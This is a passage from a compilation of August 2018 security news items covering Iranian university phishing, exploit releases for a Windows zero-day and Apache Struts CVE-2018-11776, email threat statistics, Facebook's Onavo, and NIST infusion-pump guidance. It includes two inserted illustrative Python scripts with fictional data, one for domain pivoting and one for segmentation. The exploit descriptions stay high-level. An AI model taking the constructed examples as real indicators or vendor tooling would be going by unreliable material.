The attacks share infrastructure with a previously observed campaign associated with the Iran-linked COBALT DICKENS hackers. In March, the United States indicted the Mabna Institute and nine Iranian nationals in connection with the group’s activity between 2013 and 2017.

According to the U.S. Department of Justice, the hackers targeted the accounts of more than 100,000 university professors worldwide and managed to compromise around 8,000 of them. The actors were also said to have stolen 31 terabytes of academic data and intellectual property.

“Many threat groups do not change their tactics despite public disclosures, and analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members,” SecureWorks says.

It is not uncommon for threat actors to target universities when looking to steal intellectual property. Not only are universities more difficult to secure compared to finance or healthcare organizations, but they are also highly attractive because they develop cutting-edge research and can attract global researchers and students, SecureWorks points out.

Exploit Published for Windows Task Scheduler Zero-Day
29.8.2018 securityweek

Details of an unpatched vulnerability in Microsoft’s Windows 10 operating system were made public on Monday, via Twitter.

Information on the bug and a link to proof-of-concept (PoC) code hosted on GitHub was posted by a security researcher who claims to be frustrated with Microsoft’s bug submission process.

The researcher’s Twitter account was no longer accessible shortly after she posted the tweet, but it’s unclear whether it was suspended or deleted. The flaw, however, has been already confirmed by security researchers, including Will Dormann, a vulnerability analyst at CERT/CC.

Will Dormann
I've confirmed that this works well in a fully-patched 64-bit Windows 10 system.
LPE right to SYSTEM!

12:08 AM - Aug 28, 2018

The bug, Dormann notes in a CERT/CC alert, is a local privilege escalation vulnerability in the Windows Task Scheduler’s Advanced Local Procedure Call (ALPC) interface. By exploiting the flaw, a local user could obtain SYSTEM privileges.

ALPC is a Windows-internal inter-process communication mechanism that lets client processes request information or actions from server processes running within the same OS.

“Microsoft Windows task scheduler contains a vulnerability in the handling of ALPC, which can allow a local user to gain SYSTEM privileges. The CERT/CC is currently unaware of a practical solution to this problem,” the CERT/CC alert reads.

What is yet unclear, however, is whether the vulnerability impacts all supported Windows versions, including 32-bit variants. Some researchers say the published PoC doesn’t appear to work on Windows 7, for example.

The public availability of a PoC for this privilege escalation bug is expected to stir the interest of cyber-criminals, and it might not be long before weaponized versions emerge.

An attacker using spear-phishing or other social engineering techniques could trick the victim into executing a malicious app capable of exploiting the bug.

"The Microsoft zero-day is a serious issue, as it impacts fully patched ubiquitous software -- Windows 10 -- which means almost all organizations are vulnerable to it," Glen Pendley, deputy CTO at Tenable, told SecurityWeek. "The question is not whether a patch will be released, but when. What you do between now and then is largely what will determine your level of exposure and risk. Organizations that take a defense in depth approach and those that are closely attuned to their system configurations and user behavior are the best positioned to reduce their overall risk."

Contacted by SecurityWeek to get more information on its patching plans for this bug, a Microsoft spokesperson said,"Windows has a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is to provide solutions via our current Update Tuesday schedule."

*Updated with comments from Microsoft, Tenable

Email Impersonation Attacks Increase by 80%
29.8.2018 securityweek

The latest ESRA report from Mimecast indicates just why email attacks are so loved by cybercriminals, and why organizations need to take email security more seriously.

ESRA is Mimecast's ongoing Email Security Risk Assessment quarterly analysis. Working with 37 organizations across 20 different industries, Mimecast compares the email threats it detects to those detected by the organizations' incumbent email security technologies. The results provide two major sets of statistics: the volume of threats that go undetected by the incumbent technologies; and the sheer size of the email threat.

The latest report (PDF) covers more than 142 million emails received by 261,924 users. The incumbent email security systems were Office 365 and Proofpoint.

ESRA's analysis shows that a total of more than 19 million spam emails; 13,176 emails containing dangerous file types; and 15,656 malware attachments were missed by the incumbent security and delivered to users' inboxes. It also discovered 203,000 malicious links within just over 10 million emails that were delivered to inboxes -- a ratio of around one unstopped malicious link in every fifty inspected emails.

This doesn't mean that the bad emails were effective, only that they were delivered to their destination. Other security controls might detect malware and inhibit users from clicking on malicious links -- but it does imply that these additional controls need to be 100% effective against threats that could have been blocked before delivery.

One figure that stands out in the analysis is an increase of 80% in impersonation attacks over the last quarter's analysis. Mimecast detected 41,605 cases that had been missed by the organizations' existing controls.

“Targeted malware, heavily socially-engineered impersonation attacks, and phishing threats are still reaching employee inboxes. This leaves organizations at risk of a data breach and financial loss,” said Matthew Gardiner, cybersecurity strategist at Mimecast. “Our latest quarterly analysis saw a continued attacker focus on impersonation attacks quarter-on-quarter. These are difficult attacks to identify without specialized security capabilities, and this testing shows that commonly used systems aren’t doing a good job catching them.”

Mimecast was founded in 2003 by Neil Murray (CTO) and Peter Bauer (CEO). It went public in 2015, and its share price has risen steadily from an initial $10 to its current value of just over $41. During 2018 it has acquired both Solebit (a threat detection firm) and Ataata (a security training firm).

Iran-linked COBALT DICKENS group targets universities in new phishing campaign
29.8.2018 securityaffairs APT

Experts from SecureWorks have discovered a large phishing campaign targeting universities, carried out by the Iran-linked threat actor COBALT DICKENS.
The campaign uncovered by SecureWorks involved sixteen domains hosting more than 300 spoofed websites and login pages for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

“SecureWorks Counter Threat Unit™ (CTU) researchers discovered a URL spoofing a login page for a university. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials.” reads the report published by SecureWorks.

“Sixteen domains contained over 300 spoofed websites and login pages for 76 universities located in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States”


Universities are a prime target for nation-state actors seeking intellectual property and cutting-edge research.

Most of the websites spoofed the universities' online library systems, suggesting the attackers were interested in accessing those resources to gather intelligence.

Visitors were shown a login page; once they entered their credentials they were redirected to the legitimate website, where they were either automatically logged into a valid session or asked to enter their credentials again.

Many of the domains used by COBALT DICKENS were registered between May and August 2018, most of them resolved to the same IP address and DNS name server.

The attackers shared the same infrastructure used by the COBALT DICKENS group in a previous campaign.

Iranian hacking activity has intensified in recent years, and security firms have uncovered the operations of many Iran-linked APT groups.

The US Department of Justice and Department of the Treasury in March announced charges against nine Iranians for alleged involvement in a massive state-sponsored hacking scheme; the hackers hit more than 300 universities and dozens of companies in the US and abroad and stole “valuable intellectual property and data.”

According to the Treasury Department, since 2013, the Mabna Institute hit 144 US universities and 176 universities in 21 foreign countries.

Geoffrey Berman, US Attorney for the Southern District of New York revealed that the spear phishing campaign targeted more than 100,000 university professors worldwide and about 8,000 accounts were compromised.

The Iranian hackers exfiltrated 31 terabytes of data, roughly 15 billion pages of academic projects.

The hackers also targeted the US Department of Labor, the US Federal Energy Regulatory Commission, and many private and non-governmental organizations.

The sanctions also hit the Mabna Institute, an Iran-based company, that had a critical role in coordinating the attacks on behalf of Iran’s Revolutionary Guards.

“In March 2018, the U.S. Department of Justice indicted the Mabna Institute and nine Iranian nationals in connection with COBALT DICKENS activity occurring between 2013 and 2017.” concludes the report.

“Many threat groups do not change their tactics despite public disclosures, and CTU analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members.”
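Both COBALT DICKENS items above describe the same pivot: one spoofed login page, then the shared hosting IP address and name server used to find the rest of the infrastructure, with most of the spoofed names referencing library systems. The Python below is an added example, not SecureWorks' tooling or data, that models that pivot over constructed passive-DNS style records. The institution names, domains and IP addresses are fictional placeholders (not indicators from the campaign), and the library-theme keyword list is an assumption.

```python
import re

# Constructed passive-DNS style records: (domain, A record, authoritative NS).
# Fictional institutions and RFC 5737 documentation addresses; not indicators.
RECORDS = [
    ("examplestate.edu", "192.0.2.10", "ns1.examplestate.edu"),
    ("library.examplestate.edu", "192.0.2.11", "ns1.examplestate.edu"),
    ("examplestate-edu.lib-login.example", "198.51.100.20", "ns1.hoster.example"),
    ("northvale-ac-uk.lib-access.example", "198.51.100.20", "ns1.hoster.example"),
    ("library-northvale.example", "198.51.100.20", "ns1.hoster.example"),
    ("ezproxy-examplestate.example", "198.51.100.21", "ns1.hoster.example"),
    ("unrelated-shop.example", "198.51.100.99", "ns2.other.example"),
]

# Institutions whose users we are defending (their real, registrable domains).
LEGIT_DOMAINS = {"examplestate.edu", "northvale.ac.uk"}

# Labels that point at the library / remote-access theme. Assumption, not a
# list taken from the SecureWorks report.
LIBRARY_TOKENS = ("lib", "library", "ezproxy", "login", "portal", "auth")


def is_legitimate(domain, legit_domains):
    """True for an institution's own apex domain or any subdomain of it."""
    return any(domain == d or domain.endswith("." + d) for d in legit_domains)


def institution_tokens(legit_domains):
    """First DNS label of each institution, e.g. 'northvale' from northvale.ac.uk."""
    return {d.split(".")[0] for d in legit_domains}


def pivot_from_seed(records, seed, legit_domains):
    """Start from one known spoofed domain and return every other non-legitimate
    domain sharing its A record or name server, scored by how strongly the name
    imitates a watched institution and its library services."""
    by_domain = {d: (ip, ns) for d, ip, ns in records}
    if seed not in by_domain:
        raise KeyError(f"seed {seed!r} not in records")
    seed_ip, seed_ns = by_domain[seed]
    tokens = institution_tokens(legit_domains)
    findings = {}
    for domain, ip, ns in records:
        if domain == seed or is_legitimate(domain, legit_domains):
            continue
        links = []
        if ip == seed_ip:
            links.append(f"shares A record {ip}")
        if ns == seed_ns:
            links.append(f"shares name server {ns}")
        if not links:
            continue  # no infrastructure overlap with the seed
        labels = re.split(r"[.-]", domain.lower())
        inst = sorted(t for t in tokens if t in labels)
        lib = sorted(t for t in LIBRARY_TOKENS if t in labels)
        findings[domain] = {
            "links": links,
            "institution": inst,
            "library_theme": lib,
            "score": len(links) + len(inst) + len(lib),
        }
    return findings


if __name__ == "__main__":
    seed = "examplestate-edu.lib-login.example"
    ranked = sorted(pivot_from_seed(RECORDS, seed, LEGIT_DOMAINS).items(),
                    key=lambda kv: -kv[1]["score"])
    for dom, info in ranked:
        print(f"{info['score']}  {dom}  {'; '.join(info['links'])}")
```

The hosting overlap is the primary signal and the name scoring only ranks the results: a domain that shares the seed's IP or name server is reported even when its name carries none of the watched tokens, which is what lets the pivot surface pages spoofing institutions that are not yet on the watchlist.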

Facebook Pulls Security App From Apple Store Over Privacy
28.8.2018 securityweek Social

Facebook has pulled one of its own products from Apple's app store because it didn't want to stop tracking what people were doing on their iPhones. Facebook also banned a quiz app from its social network for possible privacy intrusions on about 4 million users.

The twin developments come as Facebook is under intense scrutiny over privacy following the Cambridge Analytica scandal earlier this year. Allegations that the political consultancy used personal information harvested from 87 million Facebook accounts have dented Facebook's reputation.

Since the scandal broke, Facebook has investigated thousands of apps and suspended more than 400 of them over data-sharing concerns.

The social media company said late Wednesday that it took action against the myPersonality quiz app, saying that its creators refused an inspection. But even as Facebook did that, it found its own Onavo Protect security app at odds with Apple's tighter rules for applications.

Onavo Protect is a virtual-private network service aimed at helping users secure their personal information over public Wi-Fi networks. The app also alerts users when other apps use too much data.

Since acquiring Onavo in 2013, Facebook has used it to track what apps people were using on phones. This surveillance helped Facebook detect trendy services, tipping off the company to startups it might want to buy and areas it might want to work on for upcoming features.

Facebook said in a statement that it has "always been clear when people download Onavo about the information that is collected and how it is used."

But Onavo fell out of compliance with Apple's app-store guidelines after they were tightened two months ago to protect the reservoir of personal information that people keep on their iPhones and iPads.

Apple's revised guidelines require apps to get users' express consent before recording and logging their activity on a device. According to Apple, the new rules also "made it explicitly clear that apps should not collect information about which other apps are installed on a user's device for the purposes of analytics or advertising/marketing."

Facebook will still be able to deploy Onavo on devices powered by Google's Android software.

Onavo's ouster from Apple's app store widens the rift between two of the world's most popular companies.

Apple CEO Tim Cook has been outspoken in his belief that Facebook does a shoddy job of protecting its 2.2 billion users' privacy — something that he has framed as "a fundamental human right."

Cook sharpened his criticism following the Cambridge Analytica scandal. He emphasized that Apple would never be caught in the same situation as Facebook because it doesn't collect information about its customers to sell advertising. Facebook CEO Mark Zuckerberg fired back in a separate interview and called Cook's remarks "extremely glib." Zuckerberg implied that Apple caters primarily to rich people with a line of products that includes the $1,000 iPhone X.

Late Wednesday, Facebook said it moved to ban the myPersonality app after it found user information was shared with researchers and companies "with only limited protections in place." The company said it would notify the app's users that their data may have been misused.

It said myPersonality was "mainly active" prior to 2012. Though Facebook has tightened its rules since then, it is only now reviewing those older apps following the Cambridge Analytica scandal.

The app was created in 2007 by researcher David Stillwell and allowed users to take a personality questionnaire and get feedback on the results.

"There was no misuse of personal data," Stillwell said in a statement, adding that "this ban appears to be purely cosmetic." Stillwell said users gave their consent and the app's data was fully anonymized before it was used for academic research. He also rejected Facebook's assertion that he refused to submit to an audit.

FireEye: Tech Firms' Secret Weapon Against Disinformation
28.8.2018 securityweek IT

NEW YORK (AP) — This week has seen major social media sites step up their policing of online disinformation campaigns.

Google disabled dozens of YouTube channels and other accounts linked to a state-run Iranian broadcaster running a political-influence campaign.

Facebook removed 652 suspicious pages, groups and accounts linked to Russia and Iran.

Twitter took similar action shortly thereafter.

What did they have in common? The security firm FireEye.

Best known for its work on high-profile cyberattacks against companies including Target, JPMorgan Chase and Sony Pictures, FireEye is emerging as a key player in the fight against election interference and disinformation campaigns.

Founded in 2004, FireEye is based in Silicon Valley and staffed with a roster of former military and law-enforcement cyberexperts.

"They've really become the Navy SEALs of cybersecurity, especially for next-generation cybersecurity threats," said GBH Insights analyst Dan Ives.

Lee Foster, manager of information operations analysis at FireEye, said his team works within the company's intelligence outfit, which researches not only "info-ops" — like the Iran-linked social media activity it recently uncovered — but espionage, financial crime and other forms of vulnerability and exploitation. Specialist teams at FireEye focus on particular areas of cyberthreats, each with their own expertise and language capabilities.

"We kind of operate like a private-sector intelligence operation," he said.

FireEye was founded by Ashar Aziz, who developed a system for spotting threats that haven't been tracked before, unlike older companies that sold firewalls or anti-virus programs that block known malware.

Aziz, a former Sun Microsystems engineer, created a system that uses software to simulate a computer network and check programs for suspicious behavior, before allowing them into the network itself.

FireEye raised its profile in 2014 by acquiring Mandiant, known for expertise in assessing damage and tracing the source of cyberattacks. Mandiant founder Kevin Mandia, a former U.S. Air Force investigator, is now FireEye's CEO.

While businesses are spending more on information security, FireEye itself has spent heavily on research, development, sales and marketing. That has led to struggles to remain profitable, as heavy investments offset revenue growth.

Mandia said that during the three months ended June 30, FireEye's email security found 6 million spear-phishing attacks, a type of hacking, and its security products alerted companies of attempts to breach security 29 million times. That's important, Mandia said, because most of FireEye's products are deployed behind their client's existing firewalls or antivirus software, so everything FireEye catches has already evaded other defenses, he said.

"We are the investigators called in when the processes, people, and technology fail to prevent a security breach or incident," he said. "We find the gaps in the security fabric and we find the needle in the haystack."

FireEye Inc.'s second-quarter revenue rose 6 percent to $203 million but it lost $72.9 million, or 38 cents per share. That met Wall Street's expectations, but its shares fell as investors expected more.

That's a common problem in the white-hot cybersecurity sector, which includes competitors like Palo Alto Networks, CloudFlare and Check Point. The companies are facing high expectations as the cybersecurity market booms, fueled by heightened cyberattacks and hacking fears.

"As the space has become more competitive ... profitability and growth has been a challenge for (FireEye)," Ives said.

Still, FireEye's stock jumped 6 percent on Thursday when news broke of its role in uncovering the fake accounts on YouTube, Facebook and Twitter. It was up another 3 percent Friday.

FireEye shares hit their all-time peak of $95.63 on March 5, 2014, a few months after they went public, but began a long decline after that, hitting an all-time low of $10.40 almost exactly three years later on March 14, 2017. In the past month the stock has traded between $14.38 and $16.69.

And the company's reputation continues to grow.

"There are many vendors that play in cybersecurity when you look at some of the very sophisticated threats facing enterprise and governments," Ives said. "FireEye many times gets that first phone call when it comes to assess threat environment for companies."

Exploit for Recent Critical Apache Struts Vulnerability Published
28.8.2018 securityweek
Exploit Vulnerability

Exploit code for a critical remote code execution vulnerability in Apache Struts 2 was published on GitHub within days of the bug being patched last week.

Tracked as CVE-2018-11776, the security flaw was found to impact Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the popular Java framework.

In its advisory, Semmle, the code analysis company that discovered the flaw and reported it to the Apache Software Foundation in April, explains that the bug affects commonly used Struts endpoints that are likely to be exposed.

To make matters worse, the issue involves OGNL (Object-Graph Navigation Language), the expression language Struts uses internally and one attackers are often already familiar with.

To exploit the bug, an attacker injects their own namespace as a parameter in an HTTP request. The value of that parameter, the code analysis company says, is insufficiently validated by the Struts framework and can be any OGNL string.

Although only limited details on the vulnerability were made public, a working proof-of-concept (PoC) was published less than two days after the Apache Software Foundation released its advisory.

On Friday, threat intelligence provider Recorded Future revealed that, in addition to the PoC and a Python script that allows for easy exploitation of the vulnerability, it had also detected “chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.”

CVE-2018-11776, Recorded Future says, is even easier to exploit than last year’s CVE-2017-5638, the Apache Struts vulnerability at the heart of the Equifax breach. The firm estimates there are hundreds of millions of potentially vulnerable systems, but identifying them could be challenging, as many are backend application servers.

“The new Apache Struts vulnerability is potentially even more damaging than the one from 2017 that was used to exploit Equifax. Unlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim's Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it,” Allan Liska, Senior Security Architect, Recorded Future, said in an emailed comment to SecurityWeek.

Semmle, for its part, will not confirm whether the PoC works. The company does warn, however, that the published code could give attackers a quick way into enterprise networks.

“There is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can’t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure,” Semmle CEO, Oege de Moor, told SecurityWeek via email.

“The Equifax breach happened not because the vulnerability wasn’t fixed, but because Equifax hadn’t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn’t had the time to update their software, will now be at even greater risk,” de Moor said.

Google Tells Toomey Hackers Tried to Infiltrate Staff Email
28.8.2018 securityweek Hacking  BigBrothers

Google has alerted U.S. Sen. Pat Toomey's office that hackers with ties to a "nation-state" sent phishing emails to old campaign email accounts, a spokesman for the Pennsylvania Republican said Friday.

Toomey's office was notified this week about the attempt to infiltrate email accounts, said spokesman Steve Kelly. He said the dormant accounts hadn't been used since the end of the 2016 campaign, and the staffers they're attached to no longer work for Toomey. The nation-state wasn't identified.

"This underscores the cybersecurity threats our government, campaigns, and elections are currently facing," he said. "It is essential that Congress impose tough penalties on any entity that undermines our institutions."

Toomey currently isn't running for office and the effort would not have affected the upcoming midterm elections.

Google told Toomey's office that the emails appeared to be exploratory, Kelly said. Based on scans for spam, phishing and malware, the emails likely did not contain malware or links to a credential-phishing site, he said.

A Google spokesman said the company wasn't commenting on the phishing attempt.

The notification is the latest by a tech company of suspected Kremlin attempts to spy on U.S. elected officials and campaigns and potentially meddle in U.S. politics.

Google's warning to Toomey comes just weeks after a Microsoft discovery led Sen. Claire McCaskill, a Missouri Democrat who is running for re-election, to reveal that state-backed Russian hackers tried unsuccessfully to infiltrate her Senate computer network last fall.

That effort recalled what U.S. prosecutors called in a July 13 indictment a concerted effort by Russian military operatives ahead of the 2016 election focused on helping to elect Republican Donald Trump to the presidency by exposing internal divisions in the Democratic Party meant to discredit his opponent, Hillary Clinton. The indictment says the Russian agents broke into Democratic national organization servers and stole and leaked damaging emails.

On Tuesday, Microsoft disclosed what it called new Russian espionage efforts targeting U.S. political groups — this time conservative Republican foes that have promoted sanctions to punish the Kremlin for military aggression against Ukraine.

The company said a group tied to the Russian government created fake websites — presumably to steal passwords or plant spyware — that appeared to spoof two American conservative organizations: the Hudson Institute and the International Republican Institute. Three other fake sites were designed to look as if they belonged to the U.S. Senate.

The Kremlin denied involvement.

"Evil Internet Minute" Report Shows Scale of Malicious Online Activity
28.8.2018 securityweek

Every day, cyber threat intelligence firm RiskIQ hoovers up terabytes of internet data. It concentrates on the internet infrastructure and how it functions, gathering up domains, IP addresses, email addresses and web page materials. It does this on behalf of its customers. With booming cloud and social media, not only is there no longer a perimeter to defend, companies often don't even know what they have to defend.

The attack surface is expanding, and attackers target company brands, suppliers and customers across the internet as well as companies' own data centers. RiskIQ scans the internet to see what, where and how its customers might be vulnerable.

"We collect crawled web pages, mobile apps, social media profiles and more so that we can identify what our clients own online, so they in turn can identify any vulnerabilities or risks -- down to, for example, criminal or malicious actors who may be attempting to masquerade as their business in an effort to go after their employees, or customers, and so on," explained Brandon Dixon, RiskIQ VP of product.

"We use web crawlers," he told SecurityWeek, "which we call 'virtual users' because they have been instrumented to be able to scroll through a page as if they were a normal internet-browsing user." This instrumentation became necessary early in the company's existence, because malicious actors began to recognize RiskIQ and designed their own resources to block or divert the crawlers.

"We run about 2 billion virtual user requests every day," continued Dixon. "The virtual users follow a natural path across the internet -- so, for example, they might conduct a Google search on a keyword of importance to a customer of ours. When it finds a link of relevance, the virtual user clicks on the link, visits and interrogates the page, and visits the links contained on that page. For each page we visit, we grab and save the content, grab all the remote sources from which the page is constructed, and all of the cookies and session information."

So far, RiskIQ has gathered approximately 6 petabytes of data. That's 6,000,000 gigabytes. Some of the gathered data is held for 60 days before being aged out -- but the metadata is stored forever.

The company also scans the internet and gathers mobile apps. "One of our other methods of collecting data," said Dixon, "is to do weekly -- effectively continuous -- internet scans. We run an entire sweep of the IPv4 space, looking for IP addresses that are online, and services they may be running. We'll scan up to 111 ports, in some cases allowing customers to specify a specific port." As a result, RiskIQ is able to identify servers online, the services they're running, and whether they are on or off.

"We're also downloading as many mobile app stores as possible," he added; "including the Android store and whatever we can get our hands on from Apple -- and a number of third-party global app stores and underground mobile app stores. Where possible we decompile the apps to see what permissions they use and if they call out to any blacklisted URLs."

The analysis of this data allows RiskIQ to provide its customers with an overview of threats to their wider internet estate. The analysis is performed in the company's own pipeline. "Any time we collect data," explained Dixon, "it enters that pipeline and we apply pretty complex proprietary policies that allow us to admit an event whenever something satisfies the policy. This could be something that our customers define as interesting, or something our research team has defined as interesting -- or it could just be a generic feed including, for example, a known bad/malicious event or item."

This is a huge mass of analyzed internet data. Each year, RiskIQ compiles some of that data to generate an 'evil internet minute' report (PDF). "It brings that missing sense of scale to all the malicious things that happen on the internet," he told SecurityWeek. "People don't generally have this amount of data available to them. We're in a unique position. Not only do we observe these things, we can provide a pretty heavy statistic around what is happening online for the majority of people that we serve, and we collect from."

That sense of scale is sobering. This year's Evil Internet Minute report, published this month, depicts a range of bad things that happen on the internet every minute of every day: 0.17 blacklisted mobile apps are produced every minute (that is, one every six minutes); 0.21 new phishing domains are spun up every minute (one every five minutes); 9.2 malvertising incidents occur every minute; 0.05 new hosts running crypto-mining malware appear every minute (one every 20 minutes); and four potentially vulnerable web components are discovered every minute.

"When brands understand what they look like from the outside-in," notes an associated blog post, "they can begin developing a digital threat management strategy that allows them to discover everything associated with their organization on the internet, both legitimate and malicious, and monitor it for potentially devastating cyber-attacks."

Last month, researchers at RiskIQ connected some of the dots in this huge database and discovered that the Ticketmaster breach reported in June 2018 was just one part of a much larger campaign, known as Magecart, designed to steal users' payment-card details. Incidentally, the Evil Internet Minute notes that there are 0.07 new Magecart incidents every minute (about one every 14 minutes) somewhere on the internet.

San Francisco, Calif.-based RiskIQ raised $30.5 million in a Series C funding round led by Georgian Partners in November 2016. It brought the total raised by the firm to $65.5 million.

NIST's New Advice on Medical IoT Devices
28.8.2018 securityweek Safety

Medical infusion pumps, which deliver medications to patients, are archetypal examples of the expanding attack surface created by connected devices. Connecting these pumps to clinical systems can improve healthcare delivery, but if they are not properly secured they could endanger the patient and expose the health delivery organization (HDO) infrastructure to intrusion.

Over the last few years, researchers have shown that many infusion pumps contain vulnerabilities. In May 2015, researchers found several flaws in Hospira LifeCare pumps that could lead to remote control. In October 2016, Rapid7 found four flaws in the Animas OneTouch Ping insulin pump, one of which could alter the dose and cause a hypoglycemic reaction in the patient. In September 2017, eight remotely exploitable vulnerabilities in the Smiths Medical Medfusion 4000 wireless syringe infusion pumps were patched.

NIST has now responded to these concerns by publishing SP 1800-8: Securing Wireless Infusion Pumps in Healthcare Delivery Organizations (PDF). NIST's primary cybersecurity function is to develop standards and advice for federal agencies. Its 1800 Series, however, is a series of documents designed to present practical, usable, cybersecurity solutions to the cybersecurity community at large. Such documents do not describe regulations or mandatory practices, nor do they carry statutory authority.

SP 1800-8 applies "security controls to the pump's ecosystem to create a 'defense-in-depth' solution for protecting infusion pumps and their surrounding systems against various risk factors. Ultimately," it says, "we show how biomedical, networking, and cybersecurity engineers and IT professionals can securely configure and deploy wireless infusion pumps to reduce cybersecurity risk." It does this using standards-based, commercially available cybersecurity technologies that protect the entire HDO infrastructure.

The document offers "guidelines to better secure the wireless infusion pump ecosystem, such as the hardening of operating systems, segmenting the network, file and program whitelisting, code-signing, and using certificates for both authorization and encryption, maintaining the performance and usability of wireless infusion pumps."

Network segmentation is one of the key themes. It uses network devices such as switches and firewalls to divide a large complex network into a series of smaller subnetworks that can each be better defended. It implies only limited trust even within the organization's perimeter, with internal firewalls limiting access from one subnetwork to another to only trusted users or processes. Segmentation is an important method of preventing or limiting adversarial traversal within a corporate network. It will help prevent an attacker who has breached the wider attack surface of the network gaining access to the smaller attack surface of the medical device.

"For simplicity and convenience," says the document, "we implemented subnets that correspond exactly to VLANs. The routing configuration is the same for each subnet, but the firewall configuration may vary depending on each zone's specific purpose. An external router/firewall device is used to connect the enterprise and guest network to the internet." The segmentation was implemented via a VLAN by using Cisco switches.

It ensures that only known users/processes from a particular subnetwork can even attempt to access the device -- which is further protected by direct access controls.
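The zone model described above, as an added example that is not part of SP 1800-8 or any vendor's configuration: each subnet is one zone (the document maps subnets 1:1 to VLANs), traffic between zones is denied unless an explicit allow rule matches, and a rule audit flags policies that expose the device zone or leave the port unpinned. The zone names, address ranges, the 443 service port and the sample flows are assumptions made for illustration.

```python
"""Added example; not from SP 1800-8 or any vendor's configuration.

Models the zone-based segmentation the document describes: subnets map 1:1 to
zones (VLANs), inter-zone traffic is default-deny with an explicit allow-list,
and audit_rules() flags rules that widen the device zone's attack surface.
Zone names, address ranges and the service port are assumptions.
"""
import ipaddress
from collections import namedtuple

Rule = namedtuple("Rule", "src_zone dst_zone proto dport")  # dport None = any port

ZONES = {                                                      # assumed addressing
    "medical_devices": ipaddress.ip_network("10.10.10.0/24"),  # infusion pumps
    "clinical_apps":   ipaddress.ip_network("10.10.20.0/24"),  # pump server, EHR
    "enterprise":      ipaddress.ip_network("10.10.30.0/24"),  # staff workstations
    "guest":           ipaddress.ip_network("10.10.90.0/24"),  # visitor Wi-Fi
}

# Default deny between zones; these are the only permitted inter-zone flows.
ALLOW = [
    Rule("medical_devices", "clinical_apps", "tcp", 443),  # pump -> pump server (assumed TLS port)
    Rule("enterprise",      "clinical_apps", "tcp", 443),  # staff -> clinical applications
]


def zone_of(ip):
    """Map an address to its zone, or None if it belongs to no known subnet."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return None


def is_allowed(src_ip, dst_ip, proto, dport, rules=ALLOW):
    """Evaluate one flow against the zone policy (default deny across zones)."""
    src, dst = zone_of(src_ip), zone_of(dst_ip)
    if src is None or dst is None:
        return False            # unknown address space is dropped
    if src == dst:
        return True             # intra-zone traffic never crosses the firewall
    return any(r.src_zone == src and r.dst_zone == dst and r.proto == proto
               and (r.dport is None or r.dport == dport) for r in rules)


def audit_rules(rules):
    """Flag rules that widen the device zone's attack surface."""
    findings = []
    for r in rules:
        if r.dst_zone == "medical_devices" and r.src_zone != "clinical_apps":
            findings.append(f"{r}: device zone reachable from {r.src_zone}")
        if r.dport is None:
            findings.append(f"{r}: any-port rule, pin it to the service port")
    return findings


SAMPLE_FLOWS = [  # constructed: (src, dst, proto, dport)
    ("10.10.10.7", "10.10.20.5", "tcp", 443),  # pump reporting to its server
    ("10.10.30.4", "10.10.10.7", "tcp", 22),   # workstation trying SSH to a pump
    ("10.10.90.3", "10.10.10.7", "tcp", 443),  # guest device probing the pump VLAN
    ("10.10.10.7", "10.10.10.8", "tcp", 80),   # pump to pump, same VLAN
]

if __name__ == "__main__":
    for flow in SAMPLE_FLOWS:
        print(flow, "ALLOW" if is_allowed(*flow) else "DENY")
    for finding in audit_rules(ALLOW + [Rule("guest", "medical_devices", "tcp", None)]):
        print("audit:", finding)
```

The point of the audit function is the caveat Morales raises later: a segmentation design only limits traversal if the rule set stays narrow, so any rule that opens the device zone to workstations or guest Wi-Fi, or that permits every port, should be caught before it is deployed.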

The basic concept of securing the entire HDO infrastructure in order to better protect wireless connected devices can be applied to more than just infusion pumps, and the document has been well received by the security industry. "Defense in depth is required and is common practice," comments Joseph Kucic, chief security officer at Cavirin. "Beyond the publication, I expect that the appropriate safeguards will include a barrier gateway that records access to update electronic medical records as to who accessed the isolated Controlled Wi-Fi and all actions are done from a controlled device to ensure an audit trail with an extra authentication layer that can be controlled independent of the user's or vendor's normal access privileges. Based on this publication with the mentioned additional controls this can function as a template for other such devices."

Rishi Bhargava, co-founder at Demisto, said, "The NIST SP 1800-8 is a good first step that guides healthcare organizations towards better, more proactive protection of their IoMT (internet of medical things) environments. Since internet connected devices span across multiple industries -- both conventional and upcoming," he told SecurityWeek, "these guidelines have taken the cogent step of mapping best practices with a range of other standards like HIPAA and NIST RMF."

This doesn't mean that everybody is entirely happy with NIST 1800-8. "I'm glad to see there is a guide by NIST addressing the security of wireless infusion pumps," says Chris Morales, head of security analytics at Vectra. "The risks are real as disruption in medical devices can lead to dire consequences. Hospitals quite literally are saving lives and uptime of medical devices is a life or death situation," he told SecurityWeek.

But he is surprised that this document does not appear to be in sync with NIST's larger project on IoT security. "While wireless infusion pumps are of particular interest due to their specific application in healthcare, the risks to the devices are the exact same as any IoT device; and the recommendations should be the same," he said.

Morales is concerned about one specific statement in the NIST document: "Our reference architecture uses Cisco's solution architecture as the baseline. This baseline demonstrates how the network can be used to provide multi-tiered protection for medical devices when exchanging information via a network connection... This section provides additional details on how to employ security strategies to achieve specific targeted protections when securing wireless infusion pumps."

There's nothing new here -- it's standard segmentation practice. But in assigning it to Cisco, he feels that, effectively, "Cisco helped write this document."

"The problem here," he told SecurityWeek, "is that segmentation has never worked in hospitals. Doctors and nurses require constant access to devices and these are not locked down networks, nor can they be. If a doctor cannot access patient health records or devices, it is again a life or death situation. It is a noble attempt, but it thus far has not proven viable in health care, nor perhaps any industry with a large IoT deployment that is critical to the business function."

